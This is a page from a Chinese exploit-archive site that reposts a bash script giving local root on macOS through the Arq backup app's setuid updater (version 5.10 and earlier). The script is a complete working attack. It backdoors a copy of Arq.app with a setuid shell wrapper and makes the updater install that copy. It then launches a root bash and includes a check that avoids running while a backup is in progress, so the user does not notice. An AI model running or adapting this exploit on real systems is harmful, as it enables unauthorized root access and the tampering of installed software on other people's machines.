首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Arq 5.10 - Local Privilege Escalation (2)
来源:https://m4.rkw.io/blog.html 作者:m4rkw 发布时间:2018-01-30  
#!/bin/bash
 
#################################################################
###### Arq <= 5.10 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html              ######
#################################################################
 
app="/Applications/Arq.app"
res="$app/Contents/Resources"
lires="$app/Contents/Library/LoginItems/Arq Agent.app/Contents/Resources"
 
vuln=`ls -la "$lires/arq_updater" |grep '\-rws' |grep root`
 
if [ "$vuln" == "" ] ; then
  echo "Not vulnerable - auto-updates not enabled."
  exit 1
fi
 
if [ "$1" != "-f" ] ; then
  latest_logfile="`ls -1t ~/Library/Logs/Arq\ Agent/ |head -n1`"
  status_line="`egrep -i 'backup session.*?(ended|started)' \
    \"$HOME/Library/Logs/Arq Agent/$latest_logfile\" |tail -n1 |grep -i started`"
 
  if [ "$status_line" != "" ] ; then
    echo -n "WARNING: backup in progress, the user will very "
    echo "likely notice if we exploit now!"
    echo "use -f to override."
    exit 1
  fi
fi
 
owd="`pwd`"
 
if [ -e ~/.arq_510_privesc_exp ] ; then
  rm -rf ~/.arq_510_privesc_exp
fi
 
mkdir ~/.arq_510_privesc_exp
cd ~/.arq_510_privesc_exp
 
echo "copying application..."
 
cp -R /Applications/Arq.app .
 
echo "compiling payloads..."
 
cat > payload.sh <<EOF
#!/bin/bash
rm -rf $HOME/.arq_510_privesc_exp
while :
do
  pid=\`ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \
    |cut -d ' ' -f2\`
  if [ "\$pid" != "" ] ; then
    kill -9 \$pid
    open $app/Contents/Library/LoginItems/Arq\ Agent.app
    exit 0
  fi
done
EOF
chmod 755 payload.sh
 
au_relative=`echo "$lires/standardrestorer" |sed 's/^\/Applications\///'`
 
cat > shell.c <<EOF
#include <unistd.h>
#include <string.h>
int main(int ac, char *av[])
{
  if (ac > 1 && strcmp(av[1], "boom") == 0) {
    setuid(0);
    setgid(0);
    execl(
      "/bin/bash","bash","-c","mv -f $res/standardrestorer.orig $res/standardr"
      "estorer;chmod 4755 $res/standardrestorer;$HOME/.arq_510_privesc_exp/pay"
      "load.sh;/bin/bash", NULL
    );
  }
  return 0;
}
EOF
mv Arq.app/Contents/Resources/standardrestorer \
  Arq.app/Contents/Resources/standardrestorer.orig
gcc -o Arq.app/Contents/Resources/standardrestorer shell.c
rm -f shell.c
 
payload_size=`stat Arq.app/Contents/Resources/standardrestorer |cut -d ' ' -f8`
GID=`id |sed 's/^.*gid=//' |cut -d '(' -f1`
cwd=`pwd`
 
echo "creating backdoored Arq.zip..."
zip -1r Arq.zip Arq.app/ 1>/dev/null 2>/dev/null
rm -rf Arq.app/
 
echo "executing upgrade..."
 
"$lires/arq_updater" installupdate file://$cwd/Arq.zip $UID $GID YES \
  1>/dev/null 2>/dev/null
 
echo "waiting..."
while :
do
  ac_size=`stat $res/standardrestorer 2>/dev/null |cut -d ' ' -f8`
  x=`ls -la $res/standardrestorer |grep -- '-rwsr-xr-x' |grep root`
 
  if [ "$ac_size" == "$payload_size" -a "$x" != "" ] ; then
    cd "$owd"
    $res/standardrestorer boom
    exit 0
  fi
  sleep 0.2
done
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Arq 5.10 - Local Privilege Esc
·Advantech WebAccess < 8.3 - SQ
·macOS - 'sysctl_vfs_generic_co
·System Shield 5.0.0.136 - Priv
·Oracle WebLogic wls-wsat Compo
·LabF nfsAxe 3.7 TFTP Client -
·Trend Micro Threat Discovery A
·BMC BladeLogic RSCD Agent 8.3.
·BMC BladeLogic 8.3.00.64 - Rem
·Dup Scout Enterprise 10.4.16 I
·Asus Router Cross Site Script
·systemd Local Privilege Escala
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved